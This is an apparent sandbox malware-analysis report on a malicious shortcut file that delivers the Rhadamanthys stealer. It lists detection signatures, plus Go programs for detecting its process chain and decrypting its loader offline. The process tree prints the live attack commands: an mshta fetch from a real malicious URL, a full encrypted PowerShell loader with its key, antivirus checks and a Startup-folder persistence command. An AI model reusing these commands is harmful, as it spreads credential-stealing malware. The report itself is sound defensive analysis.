Windows
Analysis Report
setup.lnk
Overview
General Information
Detection
Name | Score | Range | Whitelisted | Confidence |
---|---|---|---|---|
RHADAMANTHYS | 100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Found URL in windows shortcut file (LNK)
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows shortcut file (LNK) contains suspicious command line arguments
Abnormal high CPU Usage
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
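Several of the signatures above (the LNK starting blacklisted processes, the MSHTA child process, `FromBase64String` and gzip decoding in PowerShell) are pieces of a single process chain that the Classification section below lists: forfiles.exe launching powershell, powershell launching mshta with a URL, and the mshta-hosted content launching a PowerShell AES/gzip stage that pipes its output into `powershell -`. The Go program below is an added example, not part of the report and not Joe Security's or any Sigma rule's logic: it encodes those three relationships as checks over process-creation events. Its events are constructed from the command lines in the report; parent PIDs are assumed from launch order because the extracted tree does not preserve nesting, and the long PowerShell stage is abbreviated to the tokens the check uses.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// ProcEvent is a minimal process-creation record, the fields Sysmon Event ID 1 or
// Windows 4688 provide. Parent PIDs below are assumed from launch order: the report
// as extracted here does not preserve tree nesting.
type ProcEvent struct {
	PID, ParentPID int
	Image, CmdLine string
}

const ps = `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`

// SampleEvents are constructed from the command lines in the Classification section.
// The AES/gzip PowerShell stage is abbreviated to the tokens the check relies on;
// the last two events are benign controls that must not alert.
var SampleEvents = []ProcEvent{
	{4320, 1, `C:\Windows\System32\forfiles.exe`, `"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://whitemansearch.shop/setup`},
	{4672, 4320, ps, `start mshta http://whitemansearch.shop/setup`},
	{7216, 4672, `C:\Windows\system32\mshta.exe`, `"C:\Windows\system32\mshta.exe" http://whitemansearch.shop/setup`},
	{7364, 7216, ps, `"` + ps + `" -w 1 -ep Unrestricted -nop $g = 'AAAA...';$k = 'eW1F...';$a = New-Object 'System.Security.Cryptography.AesManaged';$a.Key = [System.Convert]::FromBase64String($k);$d = $a.CreateDecryptor();$z = New-Object System.IO.Compression.GzipStream $m, ([IO.Compression.CompressionMode]::Decompress);$s | powershell -`},
	{7488, 7364, ps, `"` + ps + `" -`},
	{9001, 2, ps, `powershell.exe -NoProfile -Command Get-Date`},
	{9002, 9001, `C:\Windows\System32\cmd.exe`, `cmd /c echo ok`},
}

var urlRe = regexp.MustCompile(`(?i)https?://[^\s"]+`)

// base returns the lowercased file name of an image path.
func base(image string) string {
	return strings.ToLower(image[strings.LastIndexAny(image, `\/`)+1:])
}

// ancestry returns e followed by its parents, nearest first. The walk is bounded
// because PID reuse in real telemetry can produce cycles.
func ancestry(e ProcEvent, byPID map[int]ProcEvent) []ProcEvent {
	chain := []ProcEvent{e}
	for depth := 0; depth < 32; depth++ {
		p, ok := byPID[chain[len(chain)-1].ParentPID]
		if !ok {
			break
		}
		chain = append(chain, p)
	}
	return chain
}

// Detect runs three checks over process-creation events and returns one finding per hit:
//  1. mshta.exe fetching a URL with both powershell.exe and forfiles.exe in its ancestry
//     (the LNK's `forfiles /c` is proxy execution: forfiles, not the LNK, is what the
//     log shows as the parent of powershell).
//  2. A powershell.exe stage that base64-decodes and then AES-decrypts or gunzips data
//     and pipes the result into `powershell -`.
//  3. A powershell.exe whose last argument is `-` (read the script from stdin) and whose
//     parent is itself powershell.exe: the receiving end of check 2.
func Detect(events []ProcEvent) []string {
	byPID := make(map[int]ProcEvent, len(events))
	for _, e := range events {
		byPID[e.PID] = e
	}
	var findings []string
	for _, e := range events {
		c := strings.TrimSpace(e.CmdLine)
		switch base(e.Image) {
		case "mshta.exe":
			url := urlRe.FindString(c)
			if url == "" {
				continue
			}
			seen := map[string]bool{}
			for _, a := range ancestry(e, byPID)[1:] {
				seen[base(a.Image)] = true
			}
			if seen["powershell.exe"] && seen["forfiles.exe"] {
				findings = append(findings, fmt.Sprintf("PID %d: forfiles -> powershell -> mshta %s", e.PID, url))
			}
		case "powershell.exe":
			decodes := strings.Contains(c, "FromBase64String")
			transforms := strings.Contains(c, "CreateDecryptor") || strings.Contains(c, "GzipStream") || strings.Contains(c, "DeflateStream")
			if decodes && transforms && strings.HasSuffix(c, "| powershell -") {
				findings = append(findings, fmt.Sprintf("PID %d: decode/decrypt/inflate stage piped into powershell -", e.PID))
			}
			if fields := strings.Fields(c); len(fields) > 0 && fields[len(fields)-1] == "-" {
				if p, ok := byPID[e.ParentPID]; ok && base(p.Image) == "powershell.exe" {
					findings = append(findings, fmt.Sprintf("PID %d: powershell reading its script from stdin, fed by PID %d", e.PID, p.PID))
				}
			}
		}
	}
	return findings
}

func main() {
	for _, f := range Detect(SampleEvents) {
		fmt.Println(f)
	}
}
```

The ancestry walk is what makes the first check robust: a rule keyed only on "mshta.exe with parent powershell.exe" fires on plenty of admin tooling, while forfiles two levels up is rarely legitimate. The second and third checks pair up deliberately, since the piping stage and the `powershell -` reader are two events for one technique; in the report they are PIDs 7364 and 7488.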
Classification
- System is w10x64
- forfiles.exe (PID: 4320 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://whitemansearch.shop/setup MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
- conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4672 cmdline: start mshta http://whitemansearch.shop/setup MD5: 04029E121A0CFA5991749937DD22A1D9)
- mshta.exe (PID: 7216 cmdline: "C:\Windows\system32\mshta.exe" http://whitemansearch.shop/setup MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 7364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell - MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)
- chrome.exe (PID: 7596 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 7832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1972,i,9908124520727013637,16052359887422154875,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- WmiPrvSE.exe (PID: 7252 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- ClassroomEc.exe (PID: 8148 cmdline: "C:\Users\user\AppData\Roaming\ClassroomEc.exe" MD5: 956D074F7C6BD174C43586F07892E820)
- conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 748 cmdline: "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 6096 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
- findstr.exe (PID: 8084 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
- tasklist.exe (PID: 4980 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
- findstr.exe (PID: 2764 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
- cmd.exe (PID: 8224 cmdline: cmd /c md 29026 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- cmd.exe (PID: 8240 cmdline: cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 29026\Identification.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- cmd.exe (PID: 8256 cmdline: cmd /c copy /b Conf 29026\m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- Identification.pif (PID: 8272 cmdline: 29026\Identification.pif 29026\m MD5: 848164D084384C49937F99D5B894253E)
- cmd.exe (PID: 8616 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- PING.EXE (PID: 8288 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
- svchost.exe (PID: 7292 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
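The PowerShell stage in the tree above (PID 7364) is a decrypt-then-execute loader: it base64-decodes a blob, assigns bytes 0..15 to `.IV` (irrelevant, since the cipher is set to ECB mode, which uses no IV), AES-256-decrypts bytes 16.. with `PaddingMode.Zeros`, gunzips the result and pipes the resulting text into a second `powershell -`, which reads its script from standard input (the `powershell.exe -` child, PID 7488). The Go program below is an added example, not code from the report or from the sample; it reproduces that step offline so the next stage can be read without executing it. It takes the blob as its first argument (the `$gIWXcqO` value from the command line above) and defaults to the `$PAvNVyn` key shown in the report; `EncryptStage` exists only to build a constructed test vector and has no counterpart in the loader. Treat the output as the next malicious stage: read it, do not run it.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
	"os"
)

// reportKeyB64 is the $PAvNVyn value from the PowerShell stage in the process tree
// (base64 of a 32-byte key, i.e. AES-256).
const reportKeyB64 = "eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w="

// DecryptStage reproduces the loader's decrypt step:
//  1. base64-decode the blob,
//  2. drop the first 16 bytes (the stage assigns them to .IV, which ECB ignores),
//  3. AES-256-ECB-decrypt the remainder (PaddingMode.Zeros: nothing is stripped),
//  4. gunzip the result, stopping after the first gzip member so the zero padding
//     left behind by step 3 is not parsed as a second member.
// The return value is the UTF-8 script the stage pipes into `powershell -`.
func DecryptStage(blobB64, keyB64 string) (string, error) {
	key, err := base64.StdEncoding.DecodeString(keyB64)
	if err != nil {
		return "", fmt.Errorf("key: %w", err)
	}
	if len(key) != 32 {
		return "", fmt.Errorf("key: want 32 bytes for AES-256, got %d", len(key))
	}
	blob, err := base64.StdEncoding.DecodeString(blobB64)
	if err != nil {
		return "", fmt.Errorf("blob: %w", err)
	}
	if len(blob) < 16 || (len(blob)-16)%aes.BlockSize != 0 {
		return "", errors.New("blob: expected 16 skipped bytes plus whole AES blocks")
	}
	cipher, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	ct := blob[16:]
	pt := make([]byte, len(ct))
	for i := 0; i < len(ct); i += aes.BlockSize { // ECB: every block stands alone
		cipher.Decrypt(pt[i:i+aes.BlockSize], ct[i:i+aes.BlockSize])
	}
	zr, err := gzip.NewReader(bytes.NewReader(pt))
	if err != nil {
		return "", fmt.Errorf("gunzip: %w (wrong key?)", err)
	}
	zr.Multistream(false)
	script, err := io.ReadAll(zr)
	if err != nil {
		return "", fmt.Errorf("gunzip: %w", err)
	}
	return string(script), nil
}

// EncryptStage is the inverse and exists only to build a test vector here. It gzips,
// zero-pads to the block size, AES-ECB-encrypts and prepends 16 zero bytes, which is
// what the real blob also carries (its base64 opens with 21 'A's followed by 'H').
func EncryptStage(script, keyB64 string) (string, error) {
	key, err := base64.StdEncoding.DecodeString(keyB64)
	if err != nil {
		return "", err
	}
	var gz bytes.Buffer
	zw := gzip.NewWriter(&gz)
	zw.Write([]byte(script))
	zw.Close()
	pt := gz.Bytes()
	if rem := len(pt) % aes.BlockSize; rem != 0 {
		pt = append(pt, make([]byte, aes.BlockSize-rem)...)
	}
	cipher, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	out := make([]byte, 16+len(pt))
	for i := 0; i < len(pt); i += aes.BlockSize {
		cipher.Encrypt(out[16+i:16+i+aes.BlockSize], pt[i:i+aes.BlockSize])
	}
	return base64.StdEncoding.EncodeToString(out), nil
}

func main() {
	// Usage: go run . <blob_base64> [key_base64]   (key defaults to the one in the report)
	if len(os.Args) < 2 {
		fmt.Fprintln(os.Stderr, "usage: decrypt <blob_base64> [key_base64]")
		os.Exit(2)
	}
	key := reportKeyB64
	if len(os.Args) > 2 {
		key = os.Args[2]
	}
	script, err := DecryptStage(os.Args[1], key)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Print(script)
}
```

`Multistream(false)` is the one non-obvious line: zero padding survives decryption and sits after the gzip trailer, and Go's reader would otherwise try to parse it as a second member and fail. The .NET GzipStream the stage uses evidently tolerates those trailing bytes, since the sandbox run reached the `powershell -` child. A gzip header error with the report's own key and blob therefore points at a transcription problem in the blob rather than at the logic.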
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. | | | |
No configs have been found.
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | |
| | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |